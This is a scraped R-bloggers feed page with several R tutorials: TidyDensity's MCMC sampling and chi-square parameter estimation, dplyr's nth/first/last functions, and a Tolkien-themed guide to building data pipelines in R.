#>  D RcppParallel     5.1.7    2023-02-27 [1] CRAN (R 4.3.0)
#>    readr          * 2.1.5    2024-01-10 [1] CRAN (R 4.3.3)
#>    rlang            1.1.3    2024-01-10 [1] CRAN (R 4.3.3)
#>    rprojroot        2.0.4    2023-11-05 [1] CRAN (R 4.3.2)
#>    rstan            2.32.6   2024-03-05 [1] CRAN (R 4.3.3)
#>    rstudioapi       0.16.0   2024-03-24 [1] CRAN (R 4.3.3)
#>    scales           1.3.0    2023-11-28 [1] CRAN (R 4.3.2)
#>    sessioninfo      1.2.2    2021-12-06 [1] CRAN (R 4.3.0)
#>    StanHeaders      2.32.6   2024-03-01 [1] CRAN (R 4.3.3)
#>    stringi          1.8.3    2023-12-11 [1] CRAN (R 4.3.2)
#>    stringr        * 1.5.1    2023-11-14 [1] CRAN (R 4.3.2)
#>    systemfonts      1.0.6    2024-03-07 [1] CRAN (R 4.3.3)
#>    tensorA          0.36.2.1 2023-12-13 [1] CRAN (R 4.3.2)
#>    textshaping      0.3.7    2023-10-09 [1] CRAN (R 4.3.1)
#>    tibble         * 3.2.1    2023-03-20 [1] CRAN (R 4.3.0)
#>    tidyr          * 1.3.1    2024-01-24 [1] CRAN (R 4.3.3)
#>    tidyselect       1.2.1    2024-03-11 [1] CRAN (R 4.3.3)
#>    tidyverse      * 2.0.0    2023-02-22 [1] CRAN (R 4.3.0)
#>    timechange       0.3.0    2024-01-18 [1] CRAN (R 4.3.3)
#>    tzdb             0.4.0    2023-05-12 [1] CRAN (R 4.3.0)
#>    utf8             1.2.4    2023-10-22 [1] CRAN (R 4.3.1)
#>    V8               4.4.2    2024-02-15 [1] CRAN (R 4.3.3)
#>    vctrs            0.6.5    2023-12-01 [1] CRAN (R 4.3.3)
#>    withr            3.0.0    2024-01-16 [1] CRAN (R 4.3.2)
#>    xfun             0.43     2024-03-25 [1] CRAN (R 4.3.3)
#>    yaml             2.3.8    2023-12-11 [1] CRAN (R 4.3.2)
#> 
#>  [1] C:/Users/Tristan/AppData/Local/R/win-library/4.3
#>  [2] C:/Program Files/R/R-4.3.3/library
#> 
#>  D ── DLL MD5 mismatch, broken installation.
#> 
#> ──────────────────────────────────────────────────────────────────────────────

To leave a comment for the author, please follow the link and comment on their blog: Higher Order Functions.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Notes on Citing R and R Packages

Exploring Data with TidyDensity’s tidy_mcmc_sampling()

Steven P. Sanderson II, MPH — Fri, 03 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

In the area of statistical modeling and Bayesian inference, Markov Chain Monte Carlo (MCMC) methods are indispensable tools for tackling complex problems. The new tidy_mcmc_sampling() function in the TidyDensity R package simplifies MCMC sampling and visualization, making it accessible to a broader audience of data enthusiasts and analysts.

Understanding MCMC

Before we dive into the practical use of tidy_mcmc_sampling(), let’s briefly discuss why MCMC is valuable. MCMC methods are particularly useful when dealing with Bayesian statistics, where exact analytical solutions are challenging or impossible due to the complexity of the models involved.

MCMC allows us to draw samples from a probability distribution, especially in cases where direct sampling is impractical. This is achieved by constructing a Markov chain that converges to the desired distribution after a sufficient number of iterations. Once converged, these samples can provide insights into the posterior distribution of parameters, allowing us to make probabilistic inferences.

Introducing `tidy_mcmc_sampling()`

The tidy_mcmc_sampling() function in TidyDensity harnesses the power of MCMC sampling and presents the results in a tidy format, facilitating further analysis and visualization. Let’s explore its usage and capabilities.

Usage Example

Suppose we have a dataset data that we want to analyze using MCMC sampling:

library(TidyDensity)

# Generate MCMC samples
set.seed(123)
data <- rnorm(100)
result <- tidy_mcmc_sampling(data, .fns = "median", .cum_fns = "cmedian")
result

$mcmc_data
# A tibble: 4,000 × 3
   sim_number name                 value
                         
 1 1          .sample_median    -0.0285 
 2 1          .cum_stat_cmedian -0.0285 
 3 2          .sample_median     0.239  
 4 2          .cum_stat_cmedian  0.105  
 5 3          .sample_median     0.00576
 6 3          .cum_stat_cmedian  0.00576
 7 4          .sample_median    -0.0357 
 8 4          .cum_stat_cmedian -0.0114 
 9 5          .sample_median    -0.111  
10 5          .cum_stat_cmedian -0.0285 
# ℹ 3,990 more rows

$plt

In this example: - We generate 100 random normal values using rnorm(100). - The tidy_mcmc_sampling() function is then applied to this data, specifying that we want to compute the median ("median") of each MCMC sample and the cumulative median ("cmedian") across all samples, here the default sample size is 2000.

Key Arguments

.x: The input data vector for MCMC sampling.
.fns: A character vector specifying the function(s) to apply to each MCMC sample. By default, it computes the mean ("mean"), but you can customize this to any function that makes sense for your analysis.
.cum_fns: A character vector specifying the function(s) to apply to the cumulative MCMC samples. The default is to compute the cumulative mean ("cmean"), but you can change this based on your requirements.
.num_sims: The number of MCMC simulations to run. More simulations generally lead to more accurate results but can be computationally expensive. The default is 2000.

Visualizing Results

The tidy_mcmc_sampling() function not only returns tidy data but also generates a plot to visualize the MCMC samples and cumulative statistics. This visualization is essential for understanding the distribution of samples and how they evolve over iterations.

Try It Yourself!

If you’re intrigued by the capabilities of MCMC and want to explore it in your data analysis workflow, I encourage you to try out tidy_mcmc_sampling() with your own datasets and custom functions. Experiment with different parameters and visualize the results to gain deeper insights into your data.

In conclusion, tidy_mcmc_sampling() extends the functionality of TidyDensity by offering a user-friendly interface for conducting MCMC sampling and analysis. Whether you’re new to Bayesian statistics or a seasoned practitioner, this function can streamline your workflow and enhance your understanding of complex datasets. Give it a spin and unlock new possibilities in your data exploration journey!

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Exploring Data with TidyDensity’s tidy_mcmc_sampling()

Extract values from vector in R: dplyr

R Archives » Data Science Tutorials — Thu, 02 May 2024 13:20:03 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

The post Extract values from vector in R: dplyr appeared first on Data Science Tutorials

Unravel the Future: Dive Deep into the World of Data Science Today! Data Science Tutorials.

Extract values from vector in R, we will delve into extracting specific values from a vector using the nth, first, and last functions from the dplyr package in R programming language.

The article is structured into four examples that demonstrate the extraction of vector elements.

Extract patterns in R? » Data Science Tutorials

Extract values from vector in R

To begin, by installing and loading the dplyr package in R.

install.packages("dplyr")        
library("dplyr")

Our example vector, denoted as ‘x’, is a character vector containing NINE letters.

We then proceed to apply the functions to our example vector.

x <- letters[1:9]               # Create example vector
x
# "a" "b" "c" "d" "e" "f" "g" "h" "i"

Data Science & business analytics »

Example 1: nth Function

We explore the usage of the nth function, which allows us to extract a vector element from anywhere within the vector.

By applying the nth function and specifying the position of the desired element, we obtain the desired output.

nth(x, 5) # Apply nth function
# "e"     #OUTPUT

Monte Carlo Analysis in R » finnstats

Example 2: nth Function with Negative Value

Example 2 showcases the application of the nth function to extract an element from the end of the vector.

By placing a minus sign before the position, we can retrieve elements from the end of the vector.

nth(x, - 3)   # Apply nth function with negative
# "g"         #output

Example 3: first Function

Example 3 demonstrates the first function, which returns the first element of an input vector.

first(x)  # Apply first function
# "a"     #output

This function works similarly to the nth function but is specifically designed to target the first element.

Example 4: last Function

Lastly, Example 4 illustrates the use of the last function, which returns the last element of a vector.

last(x)  # Last function
# "i"    #return last value

This function complements the first function by focusing on the end of the vector.

Conclusion

This article provides a comprehensive guide on how to use the nth, first, and last functions from the dplyr package in R to extract specific elements from a vector.

By understanding and applying these functions, users can effectively manipulate and analyze their data in the R programming environment.

The post Extract values from vector in R: dplyr appeared first on Data Science Tutorials

Unlock Your Inner Data Genius: Explore, Learn, and Transform with Our Data Science Haven! Data Science Tutorials.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Extract values from vector in R: dplyr

Ainulindalë in R: Orchestrating Data Pipelines for World Creation

Numbers around us — Thu, 02 May 2024 10:32:59 +0000

[This article was first published on Numbers around us - Medium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

In the great, unfolding narrative of J.R.R. Tolkien’s Ainulindalë, the world begins not with a bang, nor a word, but with a song. The Ainur, divine spirits, sing into the void at the behest of Ilúvatar, their voices weaving together to create a harmonious reality. Just as these divine voices layer upon each other to shape the physical and metaphysical landscapes of Middle-earth, data scientists and analysts use tools and techniques to orchestrate vast pools of data into coherent, actionable insights.

The realm of data science, particularly when wielded through the versatile capabilities of R, mirrors this act of creation. Just as each Ainu contributes a unique melody to the Great Music, each step in a data pipeline adds a layer of transformation, enriching the raw data until it culminates into a symphony of insights. The process of building data pipelines in R — collecting, cleaning, transforming, and storing data — is akin to conducting a grand orchestra, where every instrument must perform in perfect harmony to achieve the desired outcome.

This article is crafted for those who stand on the brink of their own creation myths. Whether you’re a seasoned data analyst looking to refine your craft or a burgeoning scientist just beginning to wield the tools of R, the following chapters will guide you through setting up robust data pipelines, ensuring that your data projects are as flawless and impactful as the world shaped by the Ainur.

As we delve into the mechanics of data pipelines, remember that each function and package in R is an instrument in your orchestra, and you are the conductor. Let’s begin by preparing our instruments — setting up the R environment with the right packages to ensure that every note rings true.

Preparing the Instruments: Setting Up Your R Environment

As we take on the board of the creation of our data pipelines, akin to the Ainur tuning their instruments before the grand composition, it is crucial to carefully select our tools and organize our workspace in R. This preparation will ensure that the data flows smoothly through the pipeline, from raw input to insightful output.

Choosing the Right Libraries

In the almost limitless repository of R packages, selecting the right ones is critical for efficient data handling and manipulation. Here are some indispensable libraries tailored for specific stages of the data pipeline:

Data Manipulation: dplyr offers a grammar of data manipulation, providing verbs that allow you to solve the most common data manipulation challenges elegantly.
Data Tidying: tidyr complements dplyr by providing a set of functions designed to transform irregular and complex data into a tidy format.
Data Importing and Exporting: readr for fast reading and writing of data files, readxl for Excel files, and DBI for database connections.
String Operations: stringr simplifies the process of manipulating strings.

Each package is selected based on its ability to handle specific tasks within the data pipeline efficiently, ensuring that each step is optimized for both performance and ease of use.

Organizing Your Workspace

A well-organized working directory is essential for maintaining an efficient workflow. Setting your working directory in R to a project-specific folder helps in managing scripts, data files, and output systematically:

setwd("/path/to/your/project/directory")

Beyond setting the working directory, structuring your project folders effectively is crucial:

Data Folder: Store raw data and processed data separately. This separation ensures that original data remains unmodified, serving as a reliable baseline.
Scripts Folder: Maintain your R scripts here. Organizing scripts by their purpose or order of execution can streamline your workflow and make it easier to navigate your project.
Output Folder: This should contain results from analyses, including tables, charts, and reports. Keeping outputs separate from data and scripts helps in version control and avoids clutter.

Project Management Practices

Using an RStudio project can further enhance your workflow. Projects in RStudio make it easier to manage multiple related R scripts and keep all related files together. They also restore your workspace exactly as you left it, which is invaluable when working on complex data analyses.

Here’s a sample structure for a well-organized data project:

Project_Name/
│
├── data/
│   ├── raw/
│   └── processed/
│
├── R/
│   ├── cleaning.R
│   ├── analysis.R
│   └── reporting.R
│
└── output/
    ├── figures/
    └── reports/

By selecting the right libraries and organizing your R workspace and project folders strategically, you lay a solid foundation for smooth and effective data pipeline operations. Just as the Ainur needed harmony and precision to create the world, a well-prepared data scientist needs a finely tuned environment to bring data to life.

Gathering the Voices: Collecting Data

In the creation myth of Ainulindalë, each Ainur’s voice contributes uniquely to the world’s harmony. Analogously, in data science, the initial collection of data sets the tone for all analyses. This chapter will guide you through utilizing R to gather data from various sources, ensuring you capture a wide range of ‘voices’ to enrich your projects.

Understanding Data Sources

Data can originate from numerous sources, each with unique characteristics and handling requirements:

Local Files: Data often resides in files like CSVs, Excel spreadsheets, or plain text documents.
Databases: These are structured collections of data, often stored in SQL databases like MySQL or PostgreSQL, or NoSQL databases such as MongoDB.
Web Sources: Many applications and services expose their data through web APIs, or data may be scraped directly from web pages.

Using R to Import Data

R provides robust tools tailored for importing data from these varied sources, ensuring you can integrate them seamlessly into your analysis:

For CSV and Excel Files:

readr is highly optimized for reading large CSV files quickly and efficiently.
readxl extracts data from Excel files without needing Microsoft Excel.

library(readr)
data_csv <- read_csv("path/to/your/data.csv")

library(readxl)
data_excel <- read_excel("path/to/your/data.xlsx")

For Databases:

DBI is a database interface for R, which can be paired with database-specific packages like RMySQL for MySQL databases.

library(DBI)
conn <- dbConnect(RMySQL::MySQL(), dbname = "database_name", host = "host")
data_db <- dbGetQuery(conn, "SELECT * FROM table_name")

For Web Data:

rvest is ideal for scraping data from HTML web pages.
httr simplifies HTTP operations and is perfect for interacting with APIs.

library(rvest)
web_data <- read_html("http://example.com") %>%
            html_nodes("table") %>%
            html_table()

library(httr)
response <- GET("http://api.example.com/data")
api_data <- content(response, type = "application/json")

Practical Tips for Efficient Data Collection

To maximize efficiency and accuracy in your data collection efforts, consider the following tips:

Check Source Reliability: Always verify the reliability and stability of your data sources.
Automate When Possible: For recurrent data needs, automate the collection process. Tools like cron jobs on Linux and Task Scheduler on Windows can be used to schedule R scripts to run automatically.
Data Storage: Properly manage the storage of collected data. Even if the data is temporary, organize it in a manner that supports efficient access and manipulation.

Mastering the collection of data using R equips you to handle the foundational aspect of any data analysis project. By ensuring you have robust, reliable, and diverse data, your analyses can be as nuanced and comprehensive as the world crafted by the Ainur’s voices.

Refining the Harmony: Cleaning Data

Just as a symphony conductor must ensure that every instrument is precisely tuned to contribute to a harmonious performance, a data scientist must refine their collected data to ensure it is clean, structured, and ready for analysis. This chapter will guide you through the crucial process of cleaning data using R, which involves identifying and correcting inaccuracies, inconsistencies, and missing values in your data set.

Identifying Common Data Issues

Before diving into specific techniques, it’s essential to understand the common issues that can arise with raw data:

Missing Values: Data entries that are empty or contain placeholders that need to be addressed.
Duplicate Records: Repeated entries that can skew analysis results.
Inconsistent Formats: Data coming from various sources may have different formats or units, requiring standardization.
Outliers: Extreme values that could be errors or require separate analysis.

Using R Packages for Data Cleaning

R provides several packages that make the task of cleaning data efficient and straightforward:

tidyr: This package is instrumental in transforming data to a tidy format where each variable forms a column, each observation forms a row, and each type of observational unit forms a table.
dplyr: Useful for modifying data frames by removing duplicates, filtering out unwanted observations, and transforming data using its various functions.

Techniques for Cleaning Data

Here are some simple techniques to clean data effectively using R:

### Handling Missing Values

library(tidyr)
cleaned_data <- raw_data %>%
                drop_na()  # Removes rows with any NA values

### Removing duplicates

library(dplyr)
unique_data <- raw_data %>%
               distinct()  # Removes duplicate rows

### Standardizing Data Formats

# Converting all character strings to lowercase for consistency
standardized_data <- raw_data %>%
                     mutate_all(~tolower(.))

### Dealing with Outliers

# Identifying outliers based on statistical thresholds
bounds <- quantile(raw_data$variable, probs=c(0.01, 0.99))
filtered_data <- raw_data %>%
                 filter(variable > bounds[1] & variable < bounds[2])

Ensuring Data Quality

Post-cleaning, it’s important to verify the quality of your data:

Summarize Data: Get a quick overview using summary() to check if the data meets the expected standards.
Visual Inspections: Plot your data using packages like ggplot2 to visually inspect for any remaining issues.

The meticulous process of cleaning your data in R ensures that it is reliable and ready for detailed analysis. Just as the Ainur’s song required balance and precision to create a harmonious world, thorough data cleaning ensures that your analyses can be conducted without discord, leading to insights that are both accurate and actionable.

Shaping the Melody: Transforming Data

Once the data is cleansed of imperfections, the next task is akin to a composer arranging notes to create a harmonious melody. In the context of data science, transforming data involves reshaping, aggregating, or otherwise modifying it to better suit the needs of your analysis. This chapter explores how to use R to transform your cleaned data into a format that reveals deeper insights and prepares it for effective analysis.

Understanding Data Transformation

Data transformation includes a variety of operations that modify the data structure and content:

Aggregation: Combining multiple entries to reduce the data size and highlight important features.
Normalization: Scaling data to a specific range, useful for comparison and modeling.
Feature Engineering: Creating new variables from existing ones to enhance model predictability.

Utilizing R for Data Transformation

R offers powerful libraries tailored for these tasks, allowing precise control over the data transformation process:

dplyr: This package is essential for efficiently transforming data frames. It provides a coherent set of verbs that help you solve common data manipulation challenges.
tidyr: Helps in changing the layout of your data sets to make data more tidy and accessible.

Techniques for Transforming Data

### Aggregating Data:

library(dplyr)
aggregated_data <- raw_data %>%
                   group_by(category) %>%
                   summarize(mean_value = mean(value, na.rm = TRUE))

### Normalizing Data:

normalized_data <- raw_data %>%
                   mutate(normalized_value = (value - min(value)) / (max(value) - min(value)))

### Feature Engineering:

engineered_data <- raw_data %>%
                   mutate(new_feature = log(old_feature + 1))

Best Practices in Data Transformation

To ensure that the transformed data is useful and relevant for your analyses, consider the following practices:

Relevance of Transformations: Make sure that the transformations align with your analytical objectives.
Maintainability: Document the transformations clearly, ensuring they are understandable and reproducible.
Efficiency: Optimize transformations for large data sets to prevent performance bottlenecks.

Transforming data effectively allows you to sculpt the raw, cleaned data into a form that is not only analytically useful but also rich in insights. Much like the careful crafting of a symphony from basic musical notes, skillful data transformation in R helps unfold the hidden potential within your data, enabling deeper and more impactful analyses.

Preserving the Echoes: Storing Data

After transforming and refining your data, the next critical step is to store it effectively. Much like the echoes of the Ainur’s music that shaped the landscapes of Arda, the data preserved in storage will form the foundation for all future analysis and insights. This chapter explores the various data storage options available in R and how to implement them efficiently.

Introduction to Data Storage Options in R

Data can be stored in several formats, each with its own advantages depending on the use case:

.RData/.Rds: These are R's native file formats. .RData can store multiple objects in a single file, whereas .Rds stores one object per file.
Parquet: A compressed, efficient columnar data storage format optimized for use with complex data structures that supports advanced read and write capabilities.
Text and CSV Files: Simple, widely used formats that are easily readable by humans and other software, though not as space-efficient.

Choosing the Right Format

The choice of format depends on your needs:

For large datasets: Consider using Parquet for its efficiency in storage and speed in access, especially useful for complex analytical projects.
For R-specific projects: Use .RData and .Rds for their native compatibility and ability to preserve R objects exactly as they are in your environment.
For interoperability: Use CSV files when you need to share data with systems or individuals who may not be using R.

Saving Data Efficiently

To save data efficiently, consider the following R functions:

# Saving a single R object
saveRDS(object, file = "path/to/save/object.Rds")

# Saving multiple R objects
save(object1, object2, file = "path/to/save/objects.RData")

# Writing to a Parquet file
library(arrow)
write_parquet(data_frame, "path/to/save/data.parquet")

# Writing to a CSV file
write.csv(data_frame, "path/to/save/data.csv")

These methods ensure that your data is stored in a manner that is not only space-efficient but also conducive to future accessibility and analysis.

By carefully selecting the appropriate storage format and effectively utilizing R’s data-saving functions, you ensure that your data is preserved accurately and efficiently. This practice not only secures the data for future use but also maintains its integrity and accessibility, akin to the lasting and unaltered echoes of a timeless melody.

Conducting the Orchestra: Automating and Orchestrating Data Pipelines

Automation serves as the conductor in the symphony of data analysis, ensuring that each component of the data pipeline executes in perfect harmony and at the right moment. This chapter explores how to automate and orchestrate data pipelines in R, enhancing both efficiency and reliability through advanced tools designed for task scheduling and workflow management.

The Importance of Automation

Automation in data pipelines is crucial for:

Consistency: Automatically executing tasks reduces the risk of human error and ensures uniformity in data processing.
Efficiency: Frees up data professionals to focus on higher-level analysis and strategic tasks.
Scalability: As data volumes grow, automated pipelines can handle increased loads without needing proportional increases in manual oversight.

Using R to Automate Data Pipelines

R offers several tools for automation, from simple script scheduling to sophisticated workflow management:

taskscheduleR: This package allows for the scheduling of R scripts on Windows systems. It is instrumental in ensuring that data collection, processing, and reporting tasks are performed without manual intervention.
targets: A powerful package that creates and manages complex data pipelines in R, handling task dependencies and ensuring that the workflow is reproducible and efficient.

Examples of Creating Automated Workflows

### Scheduling Data Collection with taskscheduleR

library(taskscheduleR)
script_path <- "path/to/your_data_collection_script.R"

# Schedule the script to run daily at 7 AM
taskscheduler_create(taskname = "DailyDataCollection",
                     rscript = script_path,
                     schedule = "DAILY",
                     starttime = "07:00")


### Building a Data Pipeline with targets:

library(targets)

# Example of a targets pipeline definition
tar_script({
  list(
    tar_target(
      raw_data,
      readr::read_csv("path/to/data.csv"), # Data collection
      format = "file"
    ),
    tar_target(
      clean_data,
      my_cleaning_function(raw_data), # Data cleaning
      pattern = map(raw_data)
    ),
    tar_target(
      analysis_results,
      analyze_data(clean_data), # Data analysis
      pattern = cross(clean_data)
    )
  )
})

Best Practices for Pipeline Automation

Monitoring and Logging: Implement logging within scripts to track when tasks run and capture any errors or critical warnings.
Regular Reviews: Periodically review and update the scripts, schedules, and data dependencies to adapt to new business needs or data changes.
Security Protocols: Ensure all automated tasks, especially those interacting with sensitive data or external systems, adhere to strict security protocols to prevent unauthorized access.

Effective automation of data pipelines in R not only ensures that data processes are conducted with precision and timeliness but also scales up to meet the demands of complex data environments. By employing tools like taskscheduleR and targets, you orchestrate a smooth and continuous flow of data operations, much like a conductor leading an orchestra to deliver a flawless performance.

Resolving Dissonances: Robustness and Error Handling in Data Pipelines

Just like a skilled composer addresses dissonances within a symphony, a data scientist must ensure data pipelines are robust enough to handle unexpected issues effectively. This chapter outlines strategies to enhance the robustness of data pipelines in R and offers practical solutions for managing errors efficiently.

The Need for Robustness in Data Pipelines

Robust data pipelines are crucial for ensuring:

Reliability: They must perform consistently under varying conditions and with different data inputs.
Maintainability: They should be easy to update or modify without disrupting existing functionalities.
Resilience: They need to recover quickly from failures to minimize downtime and maintain data integrity.

Enhancing Pipeline Robustness with R

R provides several tools and strategies to help safeguard your data pipelines:

Error Handling Mechanisms: tryCatch() allows you to manage errors effectively, executing alternative code when errors occur.
Logging: Tools like futile.logger or logger help record operations and errors, providing a trail that can be used to diagnose issues.

Implementing Error Handling Techniques

Effective error management involves several key strategies:

### Preventive Checks:

# Early data quality checks
if(anyNA(data)) {
  stop("Data contains NA values. Please check the source.")
}


### Graceful Error Management with tryCatch():

library(logger)

robust_processing <- function(data) {
  tryCatch({
    result <- some_risky_operation(data)
    log_info("Operation successful.")
    return(result)
  }, error = function(e) {
    log_error("Error in processing: ", e$message)
    send_alert_to_maintainer("Processing error encountered: " + e$message)
    NULL  # Return NULL or handle differently
  })
}


### Notification System:
### Implementing an alert system can significantly improve the responsiveness to issues. Here’s how you can integrate such a system to send messages to the maintainer when something goes wrong:

send_alert_to_maintainer <- function(message) {
  # Assuming you have a function to send emails or messages
  mailR::send.mail(to = "maintainer@example.com",
                    subject = "Data Pipeline Error Alert",
                    body = message)
}

Best Practices for Robust Pipeline Design

Comprehensive Testing: Routinely test the pipeline using a variety of data scenarios to ensure robust handling of both typical and edge cases.
Regular Audits: Conduct periodic reviews of the pipeline to identify and rectify potential vulnerabilities before they cause failures.
Detailed Documentation and Training: Keep thorough documentation of the pipeline’s design and operational protocols. Ensure team members are trained on how to respond to different types of errors or failures.

In the narrative of Ainulindalë, it is Melkor who introduces dissonance into the harmonious music of the Ainur, creating chaos amidst creation. Similarly, in the world of data pipelines, unexpected errors and issues can be seen as dissonances introduced by Melkor-like challenges, disrupting the flow and function of our carefully orchestrated processes. By foreseeing these potential disruptions and implementing effective error handling and notification mechanisms, we ensure that our data pipelines can withstand and adapt to these challenges. This approach not only preserves the integrity of the data analysis but also ensures that the insights derived from this data remain accurate and actionable, keeping the symphony of data in continuous, harmonious play despite Melkor’s attempts to thwart the music.

Among the Ainur: Integrating R with Other Technologies

In the grand ensemble of data technologies, R plays a role akin to one of the Ainur, a powerful entity with unique capabilities. However, just like the Ainur were most effective when collaborating under Ilúvatar’s grand plan, R reaches its fullest potential when integrated within diverse technological environments. This chapter discusses how R can be seamlessly integrated with other technologies to enhance its utility and broaden its applicational horizon.

R’s Role in Diverse Data Ecosystems

R is not just a standalone tool but a part of a larger symphony that includes various data management, processing, and visualization technologies:

Cloud Computing Platforms: R can be used in cloud environments like AWS, Google Cloud, and Azure to perform statistical analysis and modeling directly on data stored in the cloud, leveraging scalable computing resources.
Big Data Platforms: Integrating R with big data technologies such as Apache Hadoop or Apache Spark enables users to handle and analyze data at scale, making R a valuable tool for big data analytics.
Data Warehousing: R can interface with data warehouses like Amazon Redshift, Snowflake, and others, which allows for sophisticated data extraction, transformation, and loading (ETL) processes, enriching the data analysis capabilities of R.
Business Intelligence Tools: Tools like Tableau, Power BI, and Looker can incorporate R for advanced analytics, bringing statistical rigor to business dashboards and reports.
Machine Learning Platforms: R’s integration with machine learning platforms like TensorFlow or PyTorch through various packages enables the development and deployment of complex machine learning models.
Workflow Automation Platforms: R can be a component in automated workflows managed by platforms like Alteryx or Knime, which facilitate the blending of data, execution of R scripts, and publication of results across a broad user base.

Enhancing Collaboration with Other Technologies

Integrating R with other technologies involves not only technical synchronization but also strategic alignment:

Complementary Use Cases: Identify scenarios where R’s statistical and graphical tools can complement other platforms’ strengths, such as using R for ad-hoc analyses and modeling while using SQL databases for data storage and management.
Hybrid Approaches: Leverage the strengths of each technology by employing hybrid approaches. For instance, preprocess data using SQL or Python, analyze it with R, and then visualize results using a BI tool.
Unified Data Strategy: Develop a cohesive data strategy that aligns the data processing capabilities of R with other enterprise tools, ensuring seamless data flow and integrity across platforms.

R’s ability to integrate with a myriad of technologies transforms it from a solitary tool into a pivotal component of comprehensive data analysis strategies. Like the harmonious interplay of the Ainur’s melodies under Ilúvatar’s guidance, R’s integration with diverse tools and platforms allows it to contribute more effectively to the collective data analysis and decision-making processes, enriching insights and fostering informed business strategies.

The Theme Resounds: Conclusion

As our journey through the orchestration of data pipelines in R comes to a close, we reflect on the narrative of the Ainulindalë, where the themes of creation, harmony, and collaboration underpin the universe’s foundation. Similarly, in the realm of data science, the harmonious integration of various technologies and practices, guided by the powerful capabilities of R, forms the bedrock of effective data analysis.

Throughout this guide, we’ve explored:

Setting up and preparing R environments for data handling, emphasizing the importance of selecting the right tools and organizing workspaces efficiently.
Collecting, cleaning, and transforming data, which are critical steps that ensure the quality and usability of data for analysis.
Storing data efficiently in various formats, ensuring that data preservation aligns with future access and analysis needs.
Automating and orchestrating data pipelines to enhance efficiency and consistency, reducing manual overhead and increasing the reliability of data processes.
Integrating R with a multitude of technologies from cloud platforms to business intelligence tools, demonstrating R’s versatility and collaborative potential in broader data ecosystems.

The field of data science, much like the ever-evolving music of the Ainur, is continually expanding and transforming. As new technologies emerge and existing ones mature, the opportunities for integrating R into your data pipelines will only grow. Exploring these possibilities not only enriches your current projects but also prepares you for future advancements in data analysis.

Just as the Ainur’s music shaped the very fabric of Middle-earth, your mastery of data pipelines in R can significantly influence the insights and outcomes derived from your data. The tools and techniques discussed here are but a foundation — continuing to build upon them, integrating new tools, and refining old ones will ensure that your data pipelines remain robust, harmonious, and forward-looking.

As we conclude this guide, remember that the theme of harmonious data handling resounds beyond the pages. It is an ongoing symphony that you contribute to with each dataset you manipulate and every analysis you perform. Let the principles of robustness, integration, and automation guide you, and continue to explore and expand the boundaries of what you can achieve with R in the vast universe of data science.

Ainulindalë in R: Orchestrating Data Pipelines for World Creation was originally published in Numbers around us on Medium, where people are continuing the conversation by highlighting and responding to this story.

To leave a comment for the author, please follow the link and comment on their blog: Numbers around us - Medium.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Ainulindalë in R: Orchestrating Data Pipelines for World Creation

Estimating Chisquare Parameters with TidyDensity

Steven P. Sanderson II, MPH — Thu, 02 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

Hello R users! Today, let’s explore the latest addition to the TidyDensity package: util_chisquare_param_estimate(). This function is designed to estimate parameters for a Chi-square distribution from your data, providing valuable insights into the underlying distribution characteristics.

Understanding the Purpose

The util_chisquare_param_estimate() function is a powerful tool for analyzing data that conforms to a Chi-square distribution. It utilizes maximum likelihood estimation (MLE) to infer the degrees of freedom (dof) and non-centrality parameter (ncp) of the Chi-square distribution based on your input vector.

Getting Started

To begin, let’s generate a dataset that conforms to a Chi-square distribution:

library(TidyDensity)

# Generate Chi-square distributed data
set.seed(123)
data <- rchisq(250, 10, 2)

# Call util_chisquare_param_estimate()
result <- util_chisquare_param_estimate(data)

By default, the function will automatically generate empirical distribution data if .auto_gen_empirical is set to TRUE. This means you’ll not only get the Chi-square parameters but also a combined table of empirical and Chi-square distribution data.

Exploring the Output

Let’s unpack what the function returns:

dist_type: Identifies the type of distribution, which will be “Chisquare” for this analysis.
samp_size: Indicates the sample size, i.e., the number of data points in your vector .x.
min, max, mean: Basic statistics summarizing your data.
dof: The estimated degrees of freedom for the Chi-square distribution.
ncp: The estimated non-centrality parameter for the Chi-square distribution.

This comprehensive output allows you to gain deeper insights into your data’s distribution characteristics, particularly when the Chi-square distribution is a potential model.

Let’s now take a look at the output itself.

library(dplyr)

result$combined_data_tbl |>
  head(5) |>
  glimpse()

Rows: 5
Columns: 8
$ sim_number  1, 1, 1, 1, 1
$ x           1, 2, 3, 4, 5
$ y           12.716908, 17.334453, 11.913559, 15.252845, 7.208524
$ dx          -2.100590, -1.952295, -1.803999, -1.655704, -1.507408
$ dy          2.741444e-05, 3.676673e-05, 4.930757e-05, 6.515313e-05, 8.6…
$ p           0.640, 0.848, 0.576, 0.744, 0.204
$ q           2.765968, 3.205658, 3.297085, 3.567437, 3.869764
$ dist_type   "Empirical", "Empirical", "Empirical", "Empirical", "Empiri…

result$combined_data_tbl |>
  tidy_distribution_summary_tbl(dist_type) |>
  glimpse()

Rows: 2
Columns: 13
$ dist_type   "Empirical", "Chisquare c(9.961, 1.979)"
$ mean_val    11.95263, 12.04686
$ median_val  10.79615, 11.48777
$ std_val     5.438087, 5.349567
$ min_val     2.765968, 1.922223
$ max_val     29.95844, 30.43480
$ skewness    0.9344797, 0.6903444
